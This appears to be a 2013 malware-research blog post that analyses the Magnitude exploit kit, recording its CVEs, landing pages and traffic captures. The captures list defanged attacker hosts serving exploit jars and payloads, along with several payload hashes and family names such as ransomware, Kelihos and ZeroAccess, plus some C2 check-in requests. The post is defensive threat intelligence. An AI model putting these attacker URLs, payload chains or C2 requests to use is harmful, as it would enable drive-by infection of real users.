2013-10-26 - Study

Magnitude EK : Pop Pop !

Magnitude

Magnitude is a community name choosen for an Exploit Kit previously referred to as "Popads".
Why Popads ?

Many days after it was first spotted, the driveby was being done using Malvert pushed via PopAds
And all landing were ending with popads.com

Magnitude 2013-03-22
Here referer : sweerl.biz

PopAds being a legit company fighting against malverts, we had to choose a proper name.

As we don't know its real name (if one), a video proposed by Will Metcalf from Emerging Threats made a consensus

Community - Magnitude (Pop pop!)

(link : http://www.youtube.com/watch?v=q-_4mcYsQdE )

Since Paunch's Arrest we are seing more and more Magnitude.

User on an Underground Forum seeking for Magnitude (^^) to grow his botnet
The world upside down.

I would rank it 2nd in term of users (Behind Neutrino, and before Kore and Nuclear Pack)

Now let's see how it's "weaponized".
Disclaimer : as usual I may hide information on stuff that seems broken.

CVE-2013-2463 with click2play bypass :

Spotted inside 2013-10-19 but was maybe there since 1 or 2 weeks.

CVE-2013-2463 + c2p bypass in Magnitude 2013-10-25
After that the computer is...slightly infected.

GET http://khncudlm.7rahdeqi .info/?7186035589665d9b107f00af07370800=v12&ed37c4cb4cd2b288135b06da53053859=[fakeUpperReferer].com&0e26f8b9e160a8b0e6176ce00d16f5db=[redacted].com
200 OK (text/html)

Magnitude Landing - Highlighted : the piece of code that won't be 404
rejected (UA based) with the configuration presented to the EK

GET http://khncudlm.7rahdeqi.info/80560ef3eddd08c9d455d41af5ea8592/cc84e758a3b4611de79628ee89895e13.swf
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/131548a8413b7f63f89dff19f8563a5e
200 OK (text/html) (this is for CVE-2013-2551 see later)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/28322e8e52bc381204f0b1e65c40e174
200 OK (text/html)

jnlp for Click2Play Bypass on jre17u21

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0f924936b800ba82b17b2085bfd53753.jar
200 OK (application/x-java-archive) 1c3d690421a56c5c67e211d747df9b72

Piece of CVE-2013-2463 in Magnitude Jar

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0f924936b800ba82b17b2085bfd53753.jar
200 OK (application/x-java-archive)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0
200 OK (text/html) Payload 1 c2a974e04298b557f976818200c879ab Stitur Ransomware

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/u.class
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/u.class
404 Not Found (text/html)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/1
200 OK (text/html) Payload 2 ba923eb3b0968a58a090db1e3079080d <- Redyms. Thx Kimberly (Stopmalvertising).

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/2
200 OK (text/html) Payload 3 f577eef07ef8331311f93fe1918c6cc6 Kelihos Spambot/loader

(Out of scope -- do :
85.255.57.253
GET /cuper02.exe HTTP/1.0 --> 004874bb466e6b8eb3dd7b09f7e3855d )

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/3
200 OK (text/html) Payload 4 (empty)

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/4
200 OK (text/html) Payload 5 4903405b85b5584fa93a1e4591b80f64 Zaccess

GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/5
200 OK (text/html) Payload 6 818f9ea202ce30645d2fb547ff1829f8 Vawtrak (Thx @virtualalloc for the information)

Note : 5 payloads...among which a Ransomware...not sure beneficiary(ies) of the other payloads would appreciate as after Ransomware computer goes for cleaning. Explanation ? I would say the owner of this Magnitude thread is selling loads for same traffic to different customers/affiliates.

CVE-2011-3402 :

The CVE is inside (see below) but couldn't get it to fire as it's overlaping with CVE-2013-2551.
Have some idea to trigger it. Will maybe update later.

CVE-2012-0507 :

I made the pass on the "ru8080" thread. (Ex : /news/ BH EK )

CVE-2012-0507 Pass in Magnitude

So I was expecting a ZeusGameOver (Zeus P2P)...nada. Strange.....

GET http://ilkbxnmtce.1deepinsget .info/?e15023ac04e9f62ad61f23a2439a9b1e=29
200 OK (text/html)

Magnitude Landing - 2013-10-25
Highlighted the code that won't UA 404.
(3 jar call (?) <embed> - Firefox - <object> IE <applet> has been deprecated )

GET http://ilkbxnmtce.1deepinsget .info/ff498283b05fd88b573e0cce15b22de5.eot
200 OK (application/vnd.ms-fontobject) CVE-2011-3402 <--

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/09c164f4b0f930b8c10c476ec5dbfbec.swf
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget.info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/8cc36c1a70beae826a15bb7df6ab5b1d
200 OK (text/html) CVE-2013-2551 (see later)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/594ce31549c12857a01c64d38c91007c
200 OK (application/x-java-archive) b075fbbe5e96e73a9a597062d6c01444

Piece of CVE-2012-0507 in Magnitude Jar

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/594ce31549c12857a01c64d38c91007c
200 OK (application/x-java-archive)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/0
200 OK (text/html) Payload 1 148ae098e23c4844ce25990643cc4150 Stitur

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/1
200 OK (text/html) Payload2 empty

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/2
200 OK (text/html) Payload3 empty

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/3
200 OK (text/html) Payload4 empty

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/4
200 OK (text/html) Payload 5 07b8dafe506e56a40527b96722bf5c70

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/5
200 OK (text/html) Payload 6 empty

CVE-2013-2551 :

Inside since 2013-10-06

First time i saw it, once decoded, it was copy paste of the code from HiMan EK (the kaf() function in HiMan got my attention for some reasons).

Magnitude EK (formerly popads) has integrated CVE-2013-2551 yesterday. ( HiMan EK copy paste again :S ) pic.twitter.com/s0NslEokhf
— kafeine (@kafeine) October 7, 2013

I won't spend much time on that one.

CVE-2013-2551 successful pass in Magnitude - 2013-10-25

GET http://tpwqihdqrb.2deepinsget .info/?103cacc2431cf5b7bec74b56d3a60444=n11&2550a61eab180c8cfd230ffc41bf33ee=google.com&26f72647ceaa00ff4e35ed5ee16cf9fa=[redacted].com

200 OK (text/html)

Magnitude Landing 2013-10-25
Highlighted the code that will fire in this pass

GET http://tpwqihdqrb.2deepinsget .info/8eab366e152f633afc4eede350c2f657/13cd72e17e6b22c976eeba91c2ab577a.swf

404 Not Found (text/html)

GET http://tpwqihdqrb.2deepinsget .info/8eab366e152f633afc4eede350c2f657/6f1ed403773ad2b9dd44dc0fbcefadef

200 OK (text/html)

Piece of CVE-2013-2551 in Magnitude 2013-10-25

GET http://5.79.85 .237/?eade56046ab80efc3a5dd1dd83f78258

200 OK (text/html) Payload 1 : df1ada88e40a58da18dc4b408600e0a5 Winwebsec

(OT: do : 219.235.1.127 GET /api/dom/no_respond/?ts=8aad4fca6d94d7b467bbaed2d1747d2e5a1cb210&token=sysdocx1&group=asp&nid=264D4000&lid=0058&ver=0058&affid=76900&dx=0 HTTP/1.1 <-- FakeAV : Winwebsec )

GET http://5.79.85 .237/?4c9a37a894f9cee76c89df68f4c18615

200 OK (text/html) Payload 2 : 4b9c8466cae1da89923ac89eca79db2a (Kelihos Spambot)

GET http://5.79.85 .237/?8dc8e224de9248e8e1cb72ceac8a5599

200 OK (text/html) Payload 3 : 2188d6a0d622d23a9c9bb7208a9f388c (Kelihos Spambot ..again (?!?) )

GET http://5.79.85 .237/?28847bf8f7c082fcd967ac01dbaec03e

200 OK (text/html) Payload 4 (empty)

GET http://5.79.85 .237/?cf20e7e042371ed8b65339bbd931e8b3

200 OK (text/html) Payload 5 : 0ac65603f3519ac09187b35df203905f Zaccess

GET http://5.79.85 .237/?ac339e60d0e6eeb0e5a1caa4d11c2fe5

200 OK (text/html) Payload 6 (empty)

(In some configuration you can get the Java call...but most of the time you'll have an IE crash before)

CVE-2013-0634 (?) :

If so inside since at least 2013-03-22

CVE-2013-0634 (?) CVE Path

GET http://vedktnyo.3deepinsget
.info/?c372e0cf1d9e9ec9b56349796a1ceb22=34
200 OK (text/html)

GET http://vedktnyo.3deepinsget .info/12db6830c13debce138ba17130b7115a/100b9090c5f6d6577b33fb8ece0c4d45.swf
200 OK (application/x-shockwave-flash) 3f4261ccc6edb559e623906472d5cd2f So CVE-2013-0634 (?)...Can't figure this out for sure. Help would be greatly appreciated :)
Sample and Associated Fiddler (Owncloud)

GET http://vedktnyo.3deepinsget .info/12db6830c13debce138ba17130b7115a/882173c54e09bf0968cbda6b32c1d145
200 OK (text/html) CVE-2013-2551 (see before)

GET http://gabetiznol .info/calculator.exe
200 OK (text/html) aeaf204a9e5e6dd55d2a85ae1b7a0dd1

------
Off Topic Payload :

74.86.20.50 http://twinkcam .net/images/s.php?id=92.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
36351 | 74.86.0.0/16 | SOFTLAYER | US | SOFTLAYER.COM | SOFTLAYER TECHNOLOGIES INC.

216.17.105.36 http://cinnamyn .com/images/s.php?id=92.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

30266 | 216.17.104.0/21 | A1COLO-COM | US | A1COLO.COM | A1COLO.COM
74.86.20.50 http://saggerboy .com/twg/b.php?id=92.1
User-Agent: Mozilla

Want to know more? S!ri's posts about it
--------

<edit1 2013-11-07>
After around 8 hours of maintenance where thread link were replying with a "stoptraff" Magnitude is back with small changes.

Magnitude Landing change on 2013-11-07

</edit1>

Exploitation Graph :

Magnitude Exploitation Graph
2013-10-26

To simplify : No plugin-detect. Your browser is being told to gather all the bullets...those that does not fit (User-Agent server side check) are then refused to him.

<edit 2014-02-06> "I may hide information on stuff that seems broken" CVE-2013-0634 was only a downloader. Couldn't figure out if owner was aware and tricked by an hypothetical hired coder...so decided to hide that to avoid helping</edit>

Thanks : Chris Wakelin and Will Metcalf

Post Publication Reading by Spiderlabs :

1st Magnitude blog: http://blog.spiderlabs.com/2014/08/a-peek-into-the-lions-den-the-magnitude-aka-popads-exploit-kit.html

2nd Magnitude blog on the Backend Infrastructure Insight I: http://blog.spiderlabs.com/2014/08/magnitude-exploit-kit-backend-infrastructure-insight-part-i.html

3rd Magnitude blog on the Backend Infrastructure Insight II: http://blog.spiderlabs.com/2014/11/magnitude-exploit-kit-backend-infrastructure-insight-part-ii.html

4th Magnitude blog on the Backend Infrastructure Insight III: http://blog.spiderlabs.com/2014/12/magnitude-exploit-kit-backend-infrastructure-insight-part-iii.html